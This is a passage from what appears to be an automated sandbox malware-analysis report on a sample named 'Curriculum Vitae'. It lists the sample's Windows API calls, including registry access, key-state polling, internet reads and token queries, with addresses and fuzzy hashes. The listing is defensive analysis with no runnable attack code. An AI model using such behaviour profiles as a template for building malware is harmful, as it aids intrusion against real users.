                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                      • String ID:
                      • API String ID: 3183298772-0
                      • Opcode ID: a5cfee3ed3f75742fe46e00c3118ae009ec0399accbddfd1855c8cde8f7f0adc
                      • Instruction ID: 0e4c84e771ebe85b8a7f0aeb52e2e99aa539bfc154efdc8a4d5234804e508af6
                      • Opcode Fuzzy Hash: a5cfee3ed3f75742fe46e00c3118ae009ec0399accbddfd1855c8cde8f7f0adc
                      • Instruction Fuzzy Hash: 31514FB24083459BCB24EB94D8919DFB3ECEF85340F04491EF689D3191EE74E6888B76
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00DBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DBB6AE,?,?), ref: 00DBC9B5
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBC9F1
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA68
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA9E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBBAA5
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DBBB00
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DBBB63
                      • RegCloseKey.ADVAPI32(?,?), ref: 00DBBBA6
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBBBB3
                      Similarity
                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                      • String ID:
                      • API String ID: 826366716-0
                      • Opcode ID: 7c71e3aa71953893f0a763cec96479588bf10ea4bbd6d3d5839903d137bb1974
                      • Instruction ID: 7767d8ca332a5e78079469da5f6e72aa9b9b82d8f18a195f009904c47c53abc8
                      • Instruction Fuzzy Hash: D1617C31208241EFD714DF14C890E6ABBE5FF84318F58855DF49A8B2A2DB71ED45CBA2
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00D98BCD
                      • VariantClear.OLEAUT32 ref: 00D98C3E
                      • VariantClear.OLEAUT32 ref: 00D98C9D
                      • VariantClear.OLEAUT32(?), ref: 00D98D10
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D98D3B
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType
                      • String ID:
                      • API String ID: 4136290138-0
                      • Opcode ID: 275cdfed2978dc5238f4ccade96b9d332e8fb0347ac3e09de9ca990d0bb3b1df
                      • Instruction ID: 999c592c37a5f3696dd2078d6b9aac8dc94f53e32aa82d1b217351b9aabe86f1
                      • Instruction Fuzzy Hash: D9515C75A0021ADFCB14CF68C894EAAB7F4FF89710B158559E909DB350D730E911CFA0
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DA8BAE
                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DA8BDA
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DA8C32
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DA8C57
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DA8C5F
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String
                      • String ID:
                      • API String ID: 2832842796-0
                      • Opcode ID: f0ce407bd422d86571777b2e5c46a55fe4662c83d3de3775e6692b41f4a41552
                      • Instruction ID: 591f7fcc6347a1ca391031a38a003d59dcef0a541c65062f38e4c52979217dd2
                      • Instruction Fuzzy Hash: E0513975A00619AFCB14DF65C880A69BBF5FF49314F088058E849AB362CB31ED51DFB0
                      APIs
                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DB8F40
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00DB8FD0
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DB8FEC
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00DB9032
                      • FreeLibrary.KERNEL32(00000000), ref: 00DB9052
                        • Part of subcall function 00D4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DA1043,?,7529E610), ref: 00D4F6E6
                        • Part of subcall function 00D4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00D8FA64,00000000,00000000,?,?,00DA1043,?,7529E610,?,00D8FA64), ref: 00D4F70D
                      Similarity
                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                      • String ID:
                      • API String ID: 666041331-0
                      • Opcode ID: 805b663179c1f01cbc9040a41b508a4aba6ee7c703dfc8d64259d3751390b219
                      • Instruction ID: 734e6faf3a40d75cbb1ab269cb68e74cdbe7cf50e3efa4477c6049a823ff5537
                      • Instruction Fuzzy Hash: 42512A35605245DFCB15EF58C4948ADBBF1FF49324F098099E90A9B362DB31ED86CBA0
                      APIs
                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DC6C33
                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00DC6C4A
                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DC6C73
                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DAAB79,00000000,00000000), ref: 00DC6C98
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DC6CC7
                      Similarity
                      • API ID: Window$Long$MessageSendShow
                      • String ID:
                      • API String ID: 3688381893-0
                      • Opcode ID: 7c8f9d7e55b3a6a151b9714ca2a7333006d5123684d5acc9094c8d065a59e3b2
                      • Instruction ID: 680da80da481e65fcef676162aadcd8cfd9c7d239a27e102907ba26b16554de4
                      • Instruction Fuzzy Hash: 6841A135A04106AFDB25CF28CE58FA97FA5EB49350F18026CF999A72E1C371ED41CA60
                      APIs
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 257cf50f8c53556ff26bcff98b05af6421aad17f810453945ae5d467142f10a0
                      • Instruction ID: b6ddeeb2831be5ed08544cb27599a44627878583a42168477f2bc27cd0f97198
                      • Instruction Fuzzy Hash: 9E41E232A00704AFCB24DF78C981A6DB3F5EF89314F194569E915EB355DB31AD01CBA0
                      APIs
                      • GetCursorPos.USER32(?), ref: 00D49141
                      • ScreenToClient.USER32(00000000,?), ref: 00D4915E
                      • GetAsyncKeyState.USER32(00000001), ref: 00D49183
                      • GetAsyncKeyState.USER32(00000002), ref: 00D4919D
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: 9940ea8a5b310586f65a4045df333f61414bc9a49933fe8083d801c47e334634
                      • Instruction ID: 6aa031139fef8860392f151f7a06a3b2a91f34e97f966c0cd8ff6aac12b96778
                      • Instruction Fuzzy Hash: 12414F71A0861BBBDF15AF65C858BEEF774FB05320F248219E469A72D4C730A950CBB1
                      APIs
                      • GetInputState.USER32 ref: 00DA38CB
                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DA3922
                      • TranslateMessage.USER32(?), ref: 00DA394B
                      • DispatchMessageW.USER32(?), ref: 00DA3955
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DA3966
                      Similarity
                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                      • String ID:
                      • API String ID: 2256411358-0
                      • Opcode ID: 18a165692381ba7ed9b175820311db1a531111c541ee68e0b81efadd3cb4fc86
                      • Instruction ID: 4acd34be0cf66e08e009099adc1afc1cb3833e43a5b506c7f28f1d05d0952e32
                      • Instruction Fuzzy Hash: 4531C4709043429FEB35CB759848BB737A9EB07344F08456DF4A6D61A0E3B99A89CF31
                      APIs
                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00DACF38
                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00DACF6F
                      • GetLastError.KERNEL32(?,00000000,?,?,?,00DAC21E,00000000), ref: 00DACFB4
                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DAC21E,00000000), ref: 00DACFC8
                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DAC21E,00000000), ref: 00DACFF2
                      Similarity
                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                      • String ID:
                      • API String ID: 3191363074-0
                      • Opcode ID: 6ba5150148ec884e7786ef7b66ccb1b5336452afd478f8c75fd408e049b2880b
                      • Instruction ID: b932c3e7f8970ad08fe760eef2edf46a9c2a84050b1b728c0be0a3ff74e7705c
                      • Instruction Fuzzy Hash: 4C316B71915306AFDB20DFA5C884AAABBF9EF05320B14542EF50AD2250EB30EE41DB70
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00D91915
                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00D919C1
                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00D919C9
                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00D919DA
                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00D919E2
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: 0c7cfa55c1e3b7d5cc20d50319aec3a50d40286148735e9fd1623ef78baa03d9
                      • Instruction ID: 40f522849a84d44e1d94cc71a007d87507d83ba3086bc9a286cfeefed79eb10f
                      • Instruction Fuzzy Hash: DD31AD75A0021AEFDF00CFA8C999ADE3BB5EB04315F144229FA65E72D1C7709944CFA0
                      APIs
                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DC5745
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DC579D
                      • _wcslen.LIBCMT ref: 00DC57AF
                      • _wcslen.LIBCMT ref: 00DC57BA
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC5816
                      Similarity
                      • API ID: MessageSend$_wcslen
                      • String ID:
                      • API String ID: 763830540-0
                      • Opcode ID: 6f2491d70cf3b89176a47507149f8ae12ba47ccd1f3f0989038f37fd961fe841
                      • Instruction ID: aa329a85b31db24ef610c5ae2ed98a96cf2353d1c103bdbd1bda358e4e110923
                      • Instruction Fuzzy Hash: B821803190461A9ADB208F60DC85EEE77B8EF05324F14825AE929EB1C4D770A9C6CF70
                      APIs
                      • IsWindow.USER32(00000000), ref: 00DB0951
                      • GetForegroundWindow.USER32 ref: 00DB0968
                      • GetDC.USER32(00000000), ref: 00DB09A4
                      • GetPixel.GDI32(00000000,?,00000003), ref: 00DB09B0
                      • ReleaseDC.USER32(00000000,00000003), ref: 00DB09E8
                      Similarity
                      • API ID: Window$ForegroundPixelRelease
                      • String ID:
                      • API String ID: 4156661090-0
                      • Opcode ID: d72f9509044ea390cca437adaf6c88b9ed7cf028026d105683c2a04e3a6ca5e8
                      • Instruction ID: 52649c4e9614d4ece6e2de3ca0ad4ab10e33bb34e36be22b34eb8bf1e62a3192
                      • Instruction Fuzzy Hash: BB216F35600205AFD704EF65C984EAEBBE9EF49740F048069F94AD7762CB70AD04CB70
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 00D6CDC6
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D6CDE9
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D6CE0F
                      • _free.LIBCMT ref: 00D6CE22
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D6CE31
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: a366c51fb5fdc88c657629758821412f6f2de66c6fde8ee9962242fc05bbec31
                      • Instruction ID: 4432435b67e5b24faceb4184133764018e9331c9bec1b36d5d93eeb05e1d4f78
                      • Instruction Fuzzy Hash: 7901A772A227167F232156B66C8CD7F7A7DDEC6FA13191129FE49C7202EA66CD0181F0
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D49693
                      • SelectObject.GDI32(?,00000000), ref: 00D496A2
                      • BeginPath.GDI32(?), ref: 00D496B9
                      • SelectObject.GDI32(?,00000000), ref: 00D496E2
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: 8fa70b406fb581696cfe069c218070dee82d25b7a03dea569d2e8f8c80e18123
                      • Instruction ID: 68995d19a2337261ed9c2a70a1b44cf86f4d6d1a97a1e733af059214a9a67f52
                      • Instruction Fuzzy Hash: 02219530812306EFDB119F67EC28BAA7B64BB90365F550255F454BA1B0D37198DACFB0
                      APIs
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: 9c8ef76d984fb0ec2c1346f46a21d468e7d0f7a434900a5d5e94552049e615a8
                      • Instruction ID: 567a8fed55e40835bbdff6af086cefe1a0cce5477d29a0dc1765480e23d6b63c
                      • Instruction Fuzzy Hash: FD01D26524160ABEAF095A50BE92FFA635EDB21395B144034FD049B245F730EE1883B0
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00D5F2DE,00D63863,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6), ref: 00D62DFD
                      • _free.LIBCMT ref: 00D62E32
                      • _free.LIBCMT ref: 00D62E59
                      • SetLastError.KERNEL32(00000000,00D31129), ref: 00D62E66
                      • SetLastError.KERNEL32(00000000,00D31129), ref: 00D62E6F
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 5d45f9f30d01fcddc188b979febe9d8b3ccfdbcc4551d4de6c33664b2ea5075e
                      • Instruction ID: cfeea767788e550f8117a42e6a5440465225a0147b37f9c22ec13a80f08304e4
                      • Opcode Fuzzy Hash: 5d45f9f30d01fcddc188b979febe9d8b3ccfdbcc4551d4de6c33664b2ea5075e
                      • Instruction Fuzzy Hash: 5301FF36685F026BC61227346C4AE3B266DEBD53B1B294039F965E22D3EB22CC118530
                      APIs
                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?,?,00D9035E), ref: 00D9002B
                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90046
                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90054
                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?), ref: 00D90064
                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90070
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: ec66db748232ad0634981e2a1ee66987dabbeb7e8cac83f2402298e698d1f214
                      • Instruction ID: 0431c6189e45ae5b89d326cb7bf2e43f383dffea3d7fee0ca774de9b34270dbd
                      • Opcode Fuzzy Hash: ec66db748232ad0634981e2a1ee66987dabbeb7e8cac83f2402298e698d1f214
                      • Instruction Fuzzy Hash: EC017872610206AFDB118F68EC05FAA7EADEF48792F185124FA09D2210E771DD408BB0
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D9E997
                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00D9E9A5
                      • Sleep.KERNEL32(00000000), ref: 00D9E9AD
                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D9E9B7
                      • Sleep.KERNEL32 ref: 00D9E9F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 5f28a0e8d4d47d73a0c3e2fbada58dc67336f4310c37b7eb0c9d71ffff541db0
                      • Instruction ID: e13fbd8be9480574a7580650215aa01981a7b44f8a1c622d24dce5f507c3b124
                      • Opcode Fuzzy Hash: 5f28a0e8d4d47d73a0c3e2fbada58dc67336f4310c37b7eb0c9d71ffff541db0
                      • Instruction Fuzzy Hash: D0011731E0162AEBCF00EBE9DC59AEDFB78FB09701F050956E646B2241DB3099558BB1
                      APIs
                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D91114
                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91120
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D9112F
                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91136
                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9114D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: 56412a01054501777b424ac9cbfcba549139d31218250b3b6d1689c9527d9575
                      • Instruction ID: edaa61ac83f79de0a7f1748d3a28e673d75adf6f6e7dab021f054baf16c64f8e
                      • Opcode Fuzzy Hash: 56412a01054501777b424ac9cbfcba549139d31218250b3b6d1689c9527d9575
                      • Instruction Fuzzy Hash: 9401F679210306BFDB114BA5DC49E6A3B6EEF892A0B244419FA49D6360DB31DC019A70
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D90FCA
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D90FD6
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D90FE5
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D90FEC
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D91002
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 6df00d2b392b1981ab5f2b6b8badafe40c9e714154aaf317014a7d08e6c40602
                      • Instruction ID: 218f957f45ed86106664da36adba0dc86e94945d21cb6e8adff6c865fbd8b411
                      • Opcode Fuzzy Hash: 6df00d2b392b1981ab5f2b6b8badafe40c9e714154aaf317014a7d08e6c40602
                      • Instruction Fuzzy Hash: 4CF04939210303ABDB214FA5AC4AF563BADFF89762F144414FA49C6351CA71DC40CA70
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D9102A
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D91036
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91045
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9104C
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91062
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 97d505ec84626bb51923cddec3b00858a914fa54a6f56762660c567733909ec2
                      • Instruction ID: 39ffef2b287b3d3788a09305ca2b2b01d5d17885d6e18865fce549f6f4998a93
                      • Opcode Fuzzy Hash: 97d505ec84626bb51923cddec3b00858a914fa54a6f56762660c567733909ec2
                      • Instruction Fuzzy Hash: C8F06D39210303EBDB215FA5EC4AF563BADFF897A1F140414FA49C7350CA71D8408A70
                      APIs
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0324
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0331
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA033E
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA034B
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0358
                      • CloseHandle.KERNEL32(?,?,?,?,00DA017D,?,00DA32FC,?,00000001,00D72592,?), ref: 00DA0365
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseHandle
                      • String ID:
                      • API String ID: 2962429428-0
                      • Opcode ID: ec3888ae5a733087e3969aa508f718b65a3aa36f8385ec5de800d780f1415ce0
                      • Instruction ID: b1c4f75ca0b3e1a1df5b4b6a7ca436b2b4bc561760a848666d74d94b264ecf2c
                      • Opcode Fuzzy Hash: ec3888ae5a733087e3969aa508f718b65a3aa36f8385ec5de800d780f1415ce0
                      • Instruction Fuzzy Hash: 4801AE72800B159FCB30AF66D880812FBF9BF613153198A3FD19652931C3B1A958DFA0
                      APIs
                      • _free.LIBCMT ref: 00D6D752
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6D764
                      • _free.LIBCMT ref: 00D6D776
                      • _free.LIBCMT ref: 00D6D788
                      • _free.LIBCMT ref: 00D6D79A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 16976078219b53ae9c84600bc8ada75c01f5e61d32e7fd17224426d0408ad0f6
                      • Instruction ID: 30560401ade46a9ff60c37eb5ab38f92cd483587d0d6b1f8e4b7ace31bdf3111
                      • Opcode Fuzzy Hash: 16976078219b53ae9c84600bc8ada75c01f5e61d32e7fd17224426d0408ad0f6
                      • Instruction Fuzzy Hash: 9EF01232B94748AB8625EB64FAC5C2677DEFB44751BA85806F449D7601CB30FC80CE75
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00D95C58
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D95C6F
                      • MessageBeep.USER32(00000000), ref: 00D95C87
                      • KillTimer.USER32(?,0000040A), ref: 00D95CA3
                      • EndDialog.USER32(?,00000001), ref: 00D95CBD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
